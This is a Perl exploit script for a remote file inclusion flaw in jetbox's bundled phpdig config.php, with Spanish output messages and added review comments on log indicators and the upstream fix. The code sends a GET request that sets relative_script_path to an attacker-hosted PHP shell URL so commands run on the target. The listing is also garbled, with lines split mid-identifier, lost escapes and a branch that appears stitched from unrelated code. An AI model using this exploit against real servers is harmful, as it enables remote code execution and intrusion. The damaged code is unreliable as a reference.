# cmd variable: cmd;
#
#############
# Description
###########
# Vendor: http://jetbox.streamedge.com/
# The file jetbox/includes/phpdig/includes/config.php uses the variable
# relative_script_path in an include() call without declaring it first, so
# its value can be supplied through the request.
# This issue has already been fixed in phpdig, but jetbox still uses a
# vulnerable version.
############
# Vuln code
############
# if (is_file("$relative_script_path/locales/$phpdig_language-language.php"))
# NOTE(review): this listing appears to be damaged by extraction. Lines are
# wrapped in the middle of expressions, string literals and an identifier,
# and the "n" at the edges of the printed strings looks like a lost "\n".
# It is kept as printed and is not a runnable script in this form.
#
# What the request shows, for anyone triaging logs: a GET to
# includes/phpdig/includes/config.php carrying a relative_script_path query
# parameter. On a jetbox install, a relative_script_path value arriving in
# the query string of that file is the indicator to search access logs for.
# The advisory text states phpdig has already fixed this upstream, so
# updating the bundled phpdig copy is the remediation the page supports.
# Presumably the parameter only reaches the script when request variables
# are auto-registered as globals (register_globals) -- confirm on the target
# configuration.
$req = HTTP::Request->new(GET
=>$Path.'includes/phpdig/includes/config.php?relative_script_path='.$Pat
htocmd.'?&'.$cmdv.'='.$cmd)or
die "nCould Not connectn";
# $xpl is defined outside this excerpt; it is used here to send the request.
$res = $xpl->request($req);
$return = $res->content;
# Character translation on the response body; the original character set
# was probably mangled in extraction ("n" likely stood for "\n") -- confirm.
$return =~ tr/[n]/[?]/;
# Failure case 1: the response contains the "HTTP request failed" error or
# the Spanish "cannot run an empty command" text. The message printed means
# "Cannot connect to the cmd host or the command is invalid"; then exit.
if ($return =~/Error: HTTP request failed!/ || $return =~/: No se
puede ejecutar un comando en blanco <b>/) {
print "nNo se puede conectar al host de la cmd o el comando es
invalidon";
exit;
# Failure case 2: the response starts with a PHP "Fatal error" banner. The
# message means "Invalid command, or there was no response".
# NOTE(review): the pattern contains an unescaped "/" as printed; a
# backslash was presumably lost in extraction.
} elsif ($return =~/^<br./>.<b>Fatal.error/) {
print "nComando Invalido, o no hubo respuestann";
}
# NOTE(review): the body of this branch prints a usage line and exits, which
# does not fit a match on the response. It looks as if the original output
# handling and a separate usage routine were merged when text was dropped
# from the page -- treat this part as incomplete.
if ($return =~ /(.*)/) {
print " <var> - var name used in phpshell : cmd rn";
exit();
}